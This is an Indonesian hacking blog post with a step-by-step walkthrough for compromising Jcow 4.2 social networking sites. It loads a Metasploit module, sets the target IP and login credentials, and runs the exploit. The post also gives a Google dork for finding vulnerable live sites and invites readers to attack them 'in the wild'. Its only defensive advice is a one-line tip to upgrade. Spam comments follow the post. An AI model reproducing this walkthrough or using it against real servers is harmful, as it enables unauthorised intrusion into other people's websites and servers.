4 Langkah Hacking Kedalam Jcow Social Networking Web Server

Apakah teman-teman di Jasakom pernah melihat CMS yang satu ini?
Jcow social networking…Ya, memang demikian namanya…Jcow menawarkan aplikasi berbasis web untuk situs jejaring sosial secara gratis alias free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil hanya 777KB tidak lebih dari 1MB.

Tapi disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4 langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).

Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94…
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0”. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)

O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2

Pada artikel ini juga saya sebelumnya sudah membuat username : “victim dan password :”victim” pada aplikasi Jcow target.

Oke kita mulai langkah demi langkahnya dibawah ini

Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb(link mediafire di website asalnya)

Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.

2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.

msf > use exploit/remote/jcow

3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.
msf exploit(jcow) > set rhost 192.168.8.94 –> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim –> set username
username => victim
msf exploit(jcow) > set password victim –> set password
password => victim

4. Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah terakhir tinggal menjalankan perintah exploit pada konsol metasploit.
Berhasil

Pengamanan :
1. Upgrade Jcow ke versi terbaru

Sumber : vishnuvalentino.com

About jaguposo

biasa" aja

Posted on 01/09/2011, in Belajar Hacking. Bookmark the permalink. 4 Komentar.

  1. Hello, constantly i used to check website posts here in the early hours in
    the morning, for the reason that i like to learn more and more.

  2. Heya i am for the first time here. I came across this board and I find
    It truly useful & it helped me out a lot. I hope to give something back and help others like you helped me.

  3. Your own post offers confirmed helpful to me personally.
    It’s extremely informative and you’re simply naturally quite educated in this region. You get exposed our sight for you to varying views on this kind of subject using intriguing, notable and strong content.

  4. I read this article completely concerning the difference of most up-to-date and preceding
    technologies, it’s remarkable article.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: